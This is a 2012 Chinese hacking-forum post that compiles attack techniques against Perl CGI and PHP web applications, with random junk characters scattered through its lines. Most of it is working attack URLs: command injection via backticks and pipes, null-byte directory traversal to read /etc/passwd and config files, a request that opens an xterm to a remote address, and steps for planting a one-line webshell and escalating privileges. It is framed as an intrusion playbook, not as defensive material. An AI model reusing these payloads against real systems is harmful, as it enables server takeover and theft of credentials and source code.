找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2995|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  4 [4 Q( {2 P, f% D! B. I+ H% W
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  
- a7 L( L1 |8 w! Y/ v* e0 }感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  # O& z6 W4 X% x5 z: \
注“  
' X2 E" R7 d* |/ B) K9 O0 `perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
) W# N' V- K0 w以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  
! m( L2 @# L, Y5 ~9 E5 ^. Y9 W) S, I
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  
+ [+ p, i* t1 k; Ohttp://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  
; S) ~/ m* {$ b8 f- l/ G9 H! ehttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  $ |; m$ _6 p) C3 U$ D
http://target.com/cgi-bin/home/news/sub.pl?`id`  
6 A# z4 H* y* {# f. Shttp://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  $ l+ P" w9 {  c. I  O0 a
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  ; q* }, e8 ]( X! e$ t' Q; R7 c3 N- b

# Q: G( i- T5 z* o# ahttp://target.com/test.pl;ls|  
' U) J4 z7 C0 M% O3 b0 r# Ihttp://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  ( Y) F5 M8 Y/ C* O- M! w
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  
1 d  {; D/ W1 Lhttp://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  " O% l, I2 h2 r5 ]9 T* X2 Q
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  
( D# {! }6 M0 k. ?- [! Ehttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  7 Y0 }$ P# W0 k8 @4 J

, ^. G- l0 W$ y3 }+ C2 Lhttp://target.com/test.pl?&........ /../../etc/passwd  7 {9 S) h2 ^3 G# @: G

' R7 {9 n0 E% v" T, e3 b' S4 ]http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  
' p; j3 S! a0 _6 Nhttp://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  5 w/ _6 [2 x! n5 ~8 K( Z$ _1 H
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  $ k# C, [3 l* d4 m1 [

) A) D5 k  J  ~; |http://www.target.org/show.php?f ... /include/config.php 查看php代码  
, W: g3 W: ]7 }) A+ b4 ohttp://www.target.org/show.php?f ... ng/admin/global.php  
" e& f( n& E2 |! c! r; Z: t6 D. l  i9 D' Z9 K% t
emm和ps的一句话+ b  j! W) m2 p& j- C" m  }  j
' i) _4 M! _& ?0 h$ Q$ k" U. r% p9 g
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  ( G4 o8 r; j9 _- j$ U* l- a+ l

% R. C* H( G, K* z1 q- X) y>bbb%20|  % Q; U" K0 p% V) F/ d1 w& k. i

1 d9 S: S+ B3 zhttp://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  
9 ]: |5 E1 H" @5 d* \4 J
! T; z& \' Z8 _. Ihttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  
3 F# R& R6 a+ E9 ^" Dhttp://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  0 D/ B0 @1 C5 x4 G
4 |  d; G( A9 ]/ v# x3 N& o7 X% B
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  ) l7 W2 w/ V$ Y0 H5 }
http://target.com/index.html#cmd.exe  % K* ^7 V3 l* V1 i
http://target.com/index.html?dummyparam=xp_cmdshell  
$ R+ H: K( Y" m7 y& }+ Zlynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  
) Q$ m2 G8 H# }, q: ~, `8 ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表